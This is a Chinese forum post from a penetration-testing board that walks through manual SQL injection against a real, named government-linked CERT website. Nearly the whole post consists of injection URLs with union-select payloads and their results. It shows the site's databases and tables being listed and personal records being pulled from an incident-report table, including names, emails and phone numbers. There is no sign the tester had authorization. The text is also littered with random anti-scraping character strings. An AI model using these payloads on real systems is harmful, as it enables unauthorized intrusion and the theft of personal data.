找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 .高级暴库方法讲解
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1822|回复: 0
打印 上一主题 下一主题

.高级暴库方法讲解

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:57:04 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询. t0 L8 t6 i& l/ B2 I: q
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解* s3 r4 I3 Q; G
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--1 `7 V7 {4 w+ K+ D' ?3 o: C
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--, P9 S9 t9 F# E! V' c6 b
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。( |  d9 _( t$ z) I
4.判断有没有写权限
4 T. q% k! D( H: N$ L. }5 Dhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
8 S& @+ ]' R8 k  I0 K没办法,手动猜表啦
  J8 T, _# L  Z" ]) C5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,12 i3 O& o- B' T) a( ?5 d
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下" Q% @- p7 W1 b! ~& ^
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--. g6 K) l4 g5 |* e2 C* g" X) E
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
& {  Q* j0 T) p5 Z" y; Tinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb: X6 E- \2 @: `& ~, x: a' U
6.爆表,爆的是twcert库
9 Y% V' w7 O  Nhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--! m2 I+ j4 R- Y' K. B7 r# q  s- `
爆出如下表
* m8 N+ G1 G1 o4 xdownloadfile,irsys,newsdata,secrpt,secrpt_big5# v: ^" P) X0 z8 Q, P
7.爆列名,这次爆的是irsys表
' m, K8 b4 \3 D1 r  mhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--2 C  ~- i; o7 _: z  a: N$ U2 _, `
爆出如下列
1 p5 A/ z' ~+ v% T6 Gir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status5 I' O6 x% j0 {$ J7 s; ~5 |& d8 q
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。: G! `1 t! \2 `, X  C; g
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--! h9 a" u* M  S! N$ ?; a9 P
返回是3,说明每个列里有3个地段  G: N/ K+ H: d2 v+ ^  [) j' W
9.爆字段内容1 x$ X" a- ^: y9 y$ P  t
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--/ E" [5 g1 O) u
爆出name列的第一个字段的内容, W) P/ ?9 d) g8 [# i
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--; P/ P- O" U6 F+ Z* I1 f" f4 K
爆出name列的第二个字段的内容
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表